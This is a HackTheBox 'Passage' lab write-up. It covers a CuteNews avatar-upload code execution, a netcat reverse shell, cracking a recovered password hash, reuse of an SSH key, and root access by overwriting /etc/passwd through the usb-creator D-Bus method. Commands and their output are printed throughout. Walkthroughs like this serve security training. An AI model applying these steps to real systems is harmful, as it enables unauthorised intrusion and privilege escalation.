HackTheBox - Passage write up
6 min read

HackTheBox - Passage write up

HackTheBox - Passage write up

Passage is a Medium Linux box.


As always, let's start with a nmap scan :

$ nmap -A -T4 -p -1024 -oN scan.nmap

22/tcp open  ssh        OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
|   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two ports are open, 22 & 80. OpenSSH seems to be updated so let's check the other port.


We can't use gobuster because of the Fail2Ban. If we click on the RSS orange button, we can see that the web application uses CuteNews.

At the bottom of the page we can see that the version of CuteNews is 2.1.1. After some research we can find that the application is vulnerable to RCE (Remote Code Execution) by uploading PHP code in the avatar of a user instead of an image.

If we right click on our avatar and click on view image we can find where our PHP shell is uploaded.

GIF8;\nuid=33(www-data) gid=33(www-data) groups=33(www-data) 


xanhacks~ $ nc -lvnp 4444
Connection from
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
python -c "import pty;pty.spawn('/bin/bash')"

We get a reverse shell !

User #1

There is two users before the root.

paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash

After enumerating the box, I found mutliple PHP scripts with serialized classes. It took me a long time to find these files because their contents was in base64, not strings likes "password" or "username" that are easy to grep.

www-data@passage:/var/www/html/CuteNews/cdata$ ls users
09.php	1e.php	48.php	5d.php	78.php	b0.php	d4.php	f7.php
0a.php	21.php	4b.php	66.php	7a.php	b7.php	d5.php	fc.php
0c.php	32.php	50.php	6e.php	8f.php	c8.php	d6.php	lines
16.php	3d.php	52.php	77.php	97.php	d1.php	dd.php	users.txt
www-data@passage:/var/www/html/CuteNews/cdata$ cat users/b0.php
<?php die('Direct call - access denied'); ?>
base64decode(YToxOntzOjQ6Im5hbWUiO2E6MTp7czoxMDoicGF1bC1...) =
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}

We have the hash of the paul user, it is a SHA-256 hash, let's crack it thanks to crackstation !

www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
Password: atlanta1

paul@passage:/var/www/html/CuteNews/cdata/users$ id
uid=1001(paul) gid=1001(paul) groups=1001(paul)
paul@passage:/var/www/html/CuteNews/cdata/users$ cd
paul@passage:~$ cat user.txt

I found the hash for the nadav user too but I cannot crack it.

User #2

Paul has a SSH private key to connect to the user nadav. Easy :)

paul@passage:~$ ls
Desktop    Downloads         Music     Public     user.txt
Documents  examples.desktop  Pictures  Templates  Videos
paul@passage:~$ ls -alR

total 24
drwxr-xr-x  2 paul paul 4096 Jul 21 10:43 .
drwxr-x--- 17 paul paul 4096 Dec 28 06:32 ..
-rw-r--r--  1 paul paul  395 Jul 21 10:43 authorized_keys
-rw-------  1 paul paul 1679 Jul 21 10:43 id_rsa
-rw-r--r--  1 paul paul  395 Jul 21 10:43 id_rsa.pub
-rw-r--r--  1 paul paul 1312 Jul 21 10:44 known_hosts

paul@passage:~$ cat .ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzXiscFGV3l9T2gvXOkh9w+BpPnhFv5AOPagArgzWDk9uUq7/4v4kuzso/lAvQIg2gYaEHlDdpqd9gCYA7tg76N5RLbroGqA6Po91Q69PQadLsziJnYumbhClgPLGuBj06YKDktI3bo/H3jxYTXY3kfIUKo3WFnoVZiTmvKLDkAlO/+S2tYQa7wMleSR01pP4VExxPW4xDfbLnnp9zOUVBpdCMHl8lRdgogOQuEadRNRwCdIkmMEY5efV3YsYcwBwc6h/ZB4u8xPyH3yFlBNR7JADkn7ZFnrdvTh3OY+kLEr6FuiSyOEWhcPybkM5hxdL9ge9bWreSfNC1122qq49d nadav@passage
paul@passage:~$ ssh -i .ssh/id_rsa nadav@localhost
Last login: Mon Dec 28 08:18:26 2020 from
nadav@passage:~$ id
uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)


After looking at the processus list, we can find this python script running as root.

nadav@passage:~$ ps -aux
root       2559  0.2  0.4 159044 18460 ?        Sl   13:05   0:00 /usr/bin/python3 /usr/share/usb-creator/usb-creator-helper

The script import the dbus module. We can introspect the bus by using the busctl command.

nadav@passage:/dev/shm$ busctl list
com.ubuntu.USBCreator  2559 usb-creator-hel root :1.67 dbus.service     ...     
nadav@passage:/dev/shm$ busctl tree com.ubuntu.USBCreator

The bus permissions are shown in /etc/dbus-1/system.d/, here we can send interface.

nadav@passage:/etc/dbus-1/system.d$ cat com.ubuntu.USBCreator.conf 
<!DOCTYPE busconfig PUBLIC
 "-//freedesktop//DTD D-BUS Bus Configuration 1.0//EN"

  <!-- Only root can own the service -->
  <policy user="root">
    <allow own="com.ubuntu.USBCreator"/>

  <!-- Allow anyone to invoke methods (further constrained by
       PolicyKit privileges -->
  <policy context="default">
    <allow send_destination="com.ubuntu.USBCreator" 
    <allow send_destination="com.ubuntu.USBCreator" 
    <allow send_destination="com.ubuntu.USBCreator" 


After searching around I found this article. It explains that we can overwrite arbitrary files on the filesystem as root, with no password prompting by injecting the python script (usb-creator-helper) Image function.

So, I copy the current /etc/passwd file and add it my own toto user with root privileged.

$ openssl passwd -1
Password: toto
Verifying - Password: toto

nadav@passage:/dev/shm$ cp /etc/passwd passwd
nadav@passage:/dev/shm$ vim passwd # add toto
nadav@passage:/dev/shm$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image $PWD/passwd /etc/passwd true
nadav@passage:/dev/shm$ cat /etc/passwd
nadav@passage:/dev/shm$ su toto
Password: toto
root@passage:/dev/shm# cat /root/root.txt 

Enjoying these posts? Subscribe for more